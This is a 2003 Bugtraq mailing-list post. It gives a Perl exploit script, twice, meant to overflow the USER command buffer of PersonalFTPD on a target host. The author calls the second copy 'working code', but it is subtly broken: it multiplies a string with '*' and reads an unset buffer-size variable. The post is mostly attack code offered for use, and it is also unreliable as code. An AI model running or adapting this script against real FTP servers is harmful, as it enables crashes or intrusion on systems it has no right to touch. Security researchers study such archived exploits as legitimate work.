Bugtraq mailing list archives
Re: Remote Stack Overflow exploit for Personal FTPD
From: subj <r2subj3ct () dwclan org>
Date: 8 May 2003 17:25:53 -0000
In-Reply-To: <20030508081123.13047.qmail () www securityfocus com>
Date: 8 May 2003 08:11:23 -0000
Message-ID: <20030508081123.13047.qmail () www securityfocus com>
From: subj <r2subj3ct () dwclan org>
To: bugtraq () securityfocus com
Subject: Remote Stack Overflow exploit for Personal FTPD

#!/usr/bin/perl
use IO::Socket;

##########################################################
#                                                        #
# Remote Stack Overflow sploit for PersonalFTPD          #
# If wanna talk with me find me on irc                   #
# irc.irochka.net #dwc, #global, #phreack                #
# ###################################################### #
# thanx to kabuto, drG4njubas, fnq                       #
# gr33tz to dhg, gipshack, rsteam, blacktigerz           #
# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
# ###################################################### #
# Vulnerability links:                                   #
# http://security.nnov.ru/search/document.asp?docid=4309 #
# http://www.securityfocus.com/archive/1/316958          #
#                                                        #
##########################################################

$data = "A";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
print "[..] by subj | dwc :: big 10x to Kabuto [..]\n";
print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n";
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

$count_param=@ARGV;
$n="0";

if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer size\n\n"; exit; }

while ($n<$count_param) {
    if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
    if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
    if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
    $n++;
}

&connect;

sub connect {
    $sock = IO::Socket::INET->new(PeerAddr => "$server",
                                  PeerPort => "$port",
                                  Proto => "tcp")
        || die "Can\'t connect to $server port $port\n";
    print $sock "USER $buffer\n";
    print "Buffer has beens sended...";
}

close($sock);
exit;
--------------------------------------------------------------------------

My apologies: I posted a non-working version, I simply picked the wrong file. Before $sock it is necessary to add $buffer.= $data * $bsize;

Working code

#!/usr/bin/perl
use IO::Socket;

##########################################################
#                                                        #
# Remote Stack Overflow sploit for PersonalFTPD          #
# If wanna talk with me find me on irc                   #
# irc.irochka.net #dwc, #global, #phreack                #
# ###################################################### #
# thanx to kabuto, drG4njubas, fnq                       #
# gr33tz to dhg, gipshack, rsteam, blacktigerz           #
# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
# ###################################################### #
# Vulnerability links:                                   #
# http://security.nnov.ru/search/document.asp?docid=4309 #
# http://www.securityfocus.com/archive/1/316958          #
#                                                        #
##########################################################

$data = "A";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
print "[..] by subj | dwc :: big 10x to Kabuto [..]\n";
print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n";
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

$count_param=@ARGV;
$n="0";

if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer size\n\n"; exit; }

while ($n<$count_param) {
    if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
    if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
    if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
    $n++;
}

&connect;

sub connect {
    $buffer.= $data * $bsize;
    $sock = IO::Socket::INET->new(PeerAddr => "$server",
                                  PeerPort => "$port",
                                  Proto => "tcp")
        || die "Can\'t connect to $server port $port\n";
    print $sock "USER $buffer\n";
    print "Buffer has beens sended...";
}

close($sock);
exit;